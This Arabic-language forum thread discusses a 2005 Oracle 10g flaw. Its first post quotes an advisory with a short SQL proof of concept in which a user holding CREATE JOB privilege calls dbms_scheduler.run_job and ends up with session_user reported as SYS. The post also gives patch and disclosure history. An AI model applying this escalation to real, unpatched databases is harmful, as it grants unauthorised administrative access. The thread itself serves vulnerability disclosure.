بتاريخ: 8 يناير 200719 سنة comment_88753 اثناء تجوالي(بتعرفو انا بسافر كثير ) في احد المواقع (الاجنبية طبعا لان المعلومة عن الاوراكل في المواقع العربية ستكون هنا اولا) لفت انتباهي موضوع عن وجود ثغرة تمت ترقيتها في 5/ 2005 واحنا ما معنا خبر المهم الثغر مش بسيطة فهي تقوم بتحويلالمستخدم العادي الى اليوزر sys نعم sysوهذا مفاد المقال DBMS_SCHEDULER SESSION_USER issue in Oracle 10g Name DBMS_SCHEDULER SESSION_USER issue in Oracle 10g Systems Affected Oracle 10g Severity Medium Risk Category Switch Oracle Username to user SYS Vendor URL http://www.oracle.com/ Credit Oracle Metalink Forum 633336.995 Exploit Forum Entry removed by Oracle Date 07 May 2005 (V 1.02) VU# 176909 Details The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user. Example Connect as a user with CREATE job privilege SQL> select user from dual; USER --------- JOBUSER SQL> execute dbms_scheduler.run_job('ANY_JOB'); PL/SQL procedure successfully completed. SQL> select user from dual; USER --------- SYS SQL> select (sys_context('userenv','session_user')) from dual; USER --------- SYS SQL> select (sys_context('userenv','current_user')) from dual; USER --------- JOBUSER SQL> show user USER is "jobuser" Patch Information Apply the patches for Oracle Critical Patch Update October 2005. History 05-may-2005 US CERT VU# added (V1.01) 07-may-2005 Oracle removed the forum entry from Metalink (V1.02) 18-oct-2005 Oracle released CPU October 2005 تحياتي تم تعديل 28 مايو 200718 سنة بواسطة moody_4u تقديم بلاغ
بتاريخ: 9 يناير 200719 سنة comment_88770 معلومه رائعه جداً... الصحيح...الكمال لله.... ويكثر خيرك يا مبدع تقديم بلاغ
بتاريخ: 9 يناير 200719 سنة comment_88785 السلام عليكمشكرا اخي موضوعك زادني حبا للاوراكلشكرا جزيلا تقديم بلاغ
بتاريخ: 9 يناير 200719 سنة كاتب الموضوع comment_88794 الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام تقديم بلاغ
بتاريخ: 9 يناير 200719 سنة comment_88795 And there is some thing elsewhen i grant sysdba to a userand when connect using that user as sysdbawhen i check for the user show useri get SYS not th euser i conneted withis that normal. تقديم بلاغ
بتاريخ: 9 يناير 200719 سنة comment_88813 شكرا مودى على معلوماتك القيمه ......وياريت متبخلش عننا باى معلومات تقديم بلاغ
بتاريخ: 9 يناير 200719 سنة comment_88838 السلام عليكمانا حاولت اجرب لكن ما قدرتلو في واحد جرب يورينا تقديم بلاغ
بتاريخ: 9 يناير 200719 سنة كاتب الموضوع comment_88841 اخوي الموضوع واضح... هذا كان في اصدار 10g ما قبل التعديل 10.1.0.3 تقديم بلاغ
بتاريخ: 6 مايو 200718 سنة comment_98948 معلومه رائعه جداً... الصحيح...الكمال لله.... ويكثر خيرك يا مبدع تقديم بلاغ
بتاريخ: 9 مايو 200718 سنة comment_99327 الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام Yest that's normal تقديم بلاغ
بتاريخ: 14 يونيو 200718 سنة comment_102374 جزاك الله الف خيرلكن المهم هل تم معالجتها في الإصدار الأخير أم لا؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ تقديم بلاغ
بتاريخ: 19 يونيو 200718 سنة comment_102858 السلام عليكم ورحمة الله وبركاتهشكرا أخي علي هذه المعلومة تقديم بلاغ
بتاريخ: 19 يونيو 200718 سنة comment_102860 يسلمووووووو أخي على المعلومة بس انا ما بعرف ايش تقصد sys وبالاخص أني مبتدئة بالاوراكل تقديم بلاغ
انضم إلى المناقشة
يمكنك المشاركة الآن والتسجيل لاحقاً. إذا كان لديك حساب, سجل دخولك الآن لتقوم بالمشاركة من خلال حسابك.